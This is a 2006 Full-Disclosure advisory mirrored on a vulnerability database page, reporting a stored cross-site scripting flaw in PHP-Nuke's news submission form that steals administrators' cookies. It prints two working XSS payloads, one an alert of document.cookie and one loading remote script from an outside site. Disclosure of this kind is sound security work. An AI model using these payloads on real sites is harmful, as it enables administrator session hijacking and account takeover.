Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11683
HistoryMar 03, 2006 - 12:00 a.m.

[Full-disclosure] PHP-NUKE Submit_News Cross-Site Scripting Vulnerability

2006-03-0300:00:00
vulners.com
11

###########################################################################

Advisory #9 Title: PHP-NUKE Submit_News Cross-Site Scripting Vulnerability

Author: 0o_zeus_o0

Contact: [email protected]

Website: www.elitemexico.org

Date: 01/03/2006

Risk: High

Vendor Url: http://www.phpnuke-espanol.org/

Affected Software: php-nuke

Non Affected:

We Are: olimpus klan team

#Info:
#================================================================
#vulnerability that affects to all the systems phpnuke in Submit_News, bugs consists

#of inserting code xss in the shipment of the news of users this cause

#that when the administrator receives that news robs its cookie, this

#would cause identity robbery

#Example XSS:
#================================================================

#<script>alert(document.cookie);</script>

#<SCRIPT SRC=http://elitemexico.org/xss.js ></SCRIPT>
#================================================================

#Solution:
#================================================================

#VULNERABLE VERSIONS
#================================================================
#all vercion

#================================================================
#Contact information
#0o_zeus_o0
#zeus@ diosdelared.com
#www.elitemexico.org
#================================================================
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
##############################################################################